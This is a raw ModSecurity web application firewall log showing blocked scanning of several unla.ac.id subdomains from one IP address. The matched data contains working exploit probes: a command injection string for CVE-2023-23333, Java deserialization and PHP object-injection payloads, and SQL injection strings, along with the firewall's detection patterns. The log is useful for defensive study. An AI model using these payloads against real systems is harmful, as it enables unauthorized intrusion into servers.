[Tue Aug 29 11:32:47.576147 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARR228AAAAF"]
[Tue Aug 29 11:32:47.594117 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARTEJgAAAAG"]
[Tue Aug 29 11:32:47.595756 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARQ32UAAAAB"]
[Tue Aug 29 11:32:47.598600 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAAN9sYsAAAAJ"]
[Tue Aug 29 11:32:47.602799 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARNk6cAAAAS"]
[Tue Aug 29 11:32:47.604270 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARIwLYAAAAO"]
[Tue Aug 29 11:32:47.633329 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARTEJkAAAAG"]
[Tue Aug 29 11:32:49.404954 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARA7b0AAAAA"]
[Tue Aug 29 11:32:49.432307 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARTEJwAAAAG"]
[Tue Aug 29 11:32:49.464228 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAAPDoI8AAAAP"]
[Tue Aug 29 11:32:49.482901 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMekAAAAR"]
[Tue Aug 29 11:32:49.485752 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARR23YAAAAF"]
[Tue Aug 29 11:32:49.593019 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARNk6sAAAAS"]
[Tue Aug 29 11:32:49.605193 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARR23cAAAAF"]
[Tue Aug 29 11:32:49.693205 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMewAAAAR"]
[Tue Aug 29 11:32:51.455104 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARMMe0AAAAR"]
[Tue Aug 29 11:32:51.460048 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARR23oAAAAF"]
[Tue Aug 29 11:32:51.460061 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARTEJ8AAAAG"]
[Tue Aug 29 11:32:51.461064 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAQKOgMAAAAs"]
[Tue Aug 29 11:32:51.462709 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARQ32oAAAAB"]
[Tue Aug 29 11:32:51.503862 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAQKOgQAAAAs"]
[Tue Aug 29 11:32:59.298248 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4UAAAAu"]
[Tue Aug 29 11:32:59.319782 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARYxBsAAAAJ"]
[Tue Aug 29 11:32:59.321374 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24UAAAAF"]
[Tue Aug 29 11:32:59.329707 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7EAAAAS"]
[Tue Aug 29 11:32:59.337042 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4cAAAAu"]
[Tue Aug 29 11:32:59.341382 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJoAAAAP"]
